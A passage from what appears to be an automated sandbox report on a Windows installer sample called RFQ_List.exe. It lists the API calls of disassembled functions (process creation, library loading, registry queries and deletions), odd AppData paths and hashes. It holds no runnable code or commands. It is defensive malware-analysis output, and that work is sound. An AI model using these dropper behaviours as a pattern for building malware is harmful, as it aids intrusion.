                  • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                  • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                  • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                  • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68
                  APIs
                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                  • wsprintfW.USER32 ref: 00406411
                  • LoadLibraryW.KERNELBASE(?), ref: 00406421
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: DirectoryLibraryLoadSystemwsprintf
                  • String ID: %s%S.dll
                  • API String ID: 2200240437-2744773210
                  • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                  • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                  • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                  • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                  APIs
                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                    • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D8A2,74DF23A0), ref: 0040520F
                    • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                    • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                    • Part of subcall function 00405735: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                    • Part of subcall function 00405735: CloseHandle.KERNEL32(0040A300), ref: 0040576B
                  • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                  • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                  • String ID:
                  • API String ID: 3585118688-0
                  • Opcode ID: 202043c5454dda3a880ce226d345d46afecf88c14aec0c9bc18f41e47eb9550b
                  • Instruction ID: 13991b0c54685da06ec2ee4a2e862f8a6615163aea1ca29b4ebe34551147a3b8
                  • Opcode Fuzzy Hash: 202043c5454dda3a880ce226d345d46afecf88c14aec0c9bc18f41e47eb9550b
                  • Instruction Fuzzy Hash: DE116131900508EBCF21AFA1CD459AE7BB6EF44354F24403BF901BA1E1D7798A919B9D
                  APIs
                    • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 00405AC2
                    • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                    • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                    • Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes,?,00000000,000000F0), ref: 00401645
                  Strings
                  • C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes, xrefs: 00401638
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: CharNext$Directory$AttributesCreateCurrentFile
                  • String ID: C:\Users\user\AppData\Local\peritonealizing\nomadeinvasioners\stofhandskernes\Microbiosis\Drifternes
                  • API String ID: 1892508949-2072545860
                  • Opcode ID: 700f7c9df297e71183510105018fd9ed945753e44605edea45ba797e43a191dd
                  • Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
                  • Opcode Fuzzy Hash: 700f7c9df297e71183510105018fd9ed945753e44605edea45ba797e43a191dd
                  • Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D
                  APIs
                    • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                    • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 00405AC2
                    • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                    • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                  • lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ_List.exe"), ref: 00405B6A
                  • GetFileAttributesW.KERNELBASE(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405B7A
                  Strings
                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B11
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: CharNext$AttributesFilelstrcpynlstrlen
                  • String ID: C:\Users\user\AppData\Local\Temp\
                  • API String ID: 3248276644-3081826266
                  • Opcode ID: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                  • Instruction ID: 9ab821bc962df094d04e13ee53e7cef05d0bc350337be3d6547239d71e0b1b07
                  • Opcode Fuzzy Hash: c6e1c51320233fe3a8d28f86eff4fa9f75d9a909d4c49901629be8da40a5a1bd
                  • Instruction Fuzzy Hash: FFF0A429504E5115D72272361D49EBF3669CF86324B1A063FF852B22D1DB3CB952CCBD
                  APIs
                  • IsWindowVisible.USER32(?), ref: 00405157
                  • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                    • Part of subcall function 00404165: SendMessageW.USER32(0001042C,00000000,00000000,00000000), ref: 00404177
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Window$CallMessageProcSendVisible
                  • String ID:
                  • API String ID: 3748168415-3916222277
                  • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                  • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                  • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                  • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                  APIs
                  • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430270,Error launching installer), ref: 0040575E
                  • CloseHandle.KERNEL32(0040A300), ref: 0040576B
                  Strings
                  • Error launching installer, xrefs: 00405748
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: CloseCreateHandleProcess
                  • String ID: Error launching installer
                  • API String ID: 3712363035-66219284
                  • Opcode ID: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                  • Instruction ID: 39588cd766b2ea89d65183b6a6bcc828c6470883592abd44c37ede1670716c40
                  • Opcode Fuzzy Hash: d9d25ead1e61dd1de32296c4779b051624e3cc0dc0aa34a2348a33ced0ef8ad4
                  • Instruction Fuzzy Hash: B8E0B6B4600209BFEB109B64ED49F7B7AADEB04708F004665BD50F6191DB74EC158B78
                  APIs
                  • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00401FEE
                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                    • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D8A2,74DF23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                    • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D8A2,74DF23A0), ref: 0040520F
                    • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                    • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                    • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                  • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                  • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                  • String ID:
                  • API String ID: 334405425-0
                  • Opcode ID: 8468dde12270efaee3623ef0ee2643c620c6226164998a0f0f0bd77c720df999
                  • Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
                  • Opcode Fuzzy Hash: 8468dde12270efaee3623ef0ee2643c620c6226164998a0f0f0bd77c720df999
                  • Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D
                  APIs
                  • GlobalFree.KERNEL32(00000000), ref: 00401BA7
                  • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Global$AllocFree
                  • String ID: C:\Windows\Fonts\sipunculid.gra
                  • API String ID: 3394109436-1058031894
                  • Opcode ID: daf19240af0bec5427d7d75aebbddc3e58b55c9256abfd3c92eb23101e06bf00
                  • Instruction ID: 27804974e3ca03393c04398de70bc6092cde1ed56c9d8f76027c1228d60f226a
                  • Opcode Fuzzy Hash: daf19240af0bec5427d7d75aebbddc3e58b55c9256abfd3c92eb23101e06bf00
                  • Instruction Fuzzy Hash: 32219072600101EBCB10EFA4CE85E5F77BAAF45324725413BF116B32D1DA78A8519B1D
                  APIs
                    • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                  • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                  • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                  • RegCloseKey.ADVAPI32(?,?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: Enum$CloseOpenValue
                  • String ID:
                  • API String ID: 167947723-0
                  • Opcode ID: 52b1034902b6533bd2d6d50c47519d0e0d132e6ce1eb16c8f111a809d007a761
                  • Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
                  • Opcode Fuzzy Hash: 52b1034902b6533bd2d6d50c47519d0e0d132e6ce1eb16c8f111a809d007a761
                  • Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                  APIs
                    • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                  • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
                  • RegCloseKey.ADVAPI32(?,?,?,Copy to C:\Users\Public\Desktop\Bardehvalers.unw,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: CloseOpenQueryValue
                  • String ID:
                  • API String ID: 3677997916-0
                  • Opcode ID: e8cdc2980028b670d4ddc5f3186f10a85cd29f3b4eedee526efe3e64a1379a7a
                  • Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
                  • Opcode Fuzzy Hash: e8cdc2980028b670d4ddc5f3186f10a85cd29f3b4eedee526efe3e64a1379a7a
                  • Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59
                  APIs
                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                  • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: MessageSend
                  • String ID:
                  • API String ID: 3850602802-0
                  • Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                  • Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
                  • Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                  • Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C
                  APIs
                    • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
                  • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                  Memory Dump Source
                  • Source File: 00000000.00000002.1760168553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.1760114987.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760190871.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.0000000000439000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760257467.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1760585109.0000000000471000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_RFQ_List.jbxd
                  Similarity
                  • API ID: CloseDeleteOpenValue
                  • String ID:
                  • API String ID: 849931509-0
                  • Opcode ID: 45e7bfa75de394aabc60a00221bac3dee61c605efc9a99c65b382dbe1571e612
                  • Instruction ID: c2222f3894d46b01c01a36c2377af854b7dcf2fa525412944523e76cc0079291
                  • Opcode Fuzzy Hash: 45e7bfa75de394aabc60a00221bac3dee61c605efc9a99c65b382dbe1571e612
                  • Instruction Fuzzy Hash: 2DF04F32A04110ABEB11BFB59B4EABE72699B80314F15803BF501B71D5D9FC99015629
                  APIs
                  • GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                    • Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                    • Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
                    • Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421
                  Memory Dump Source
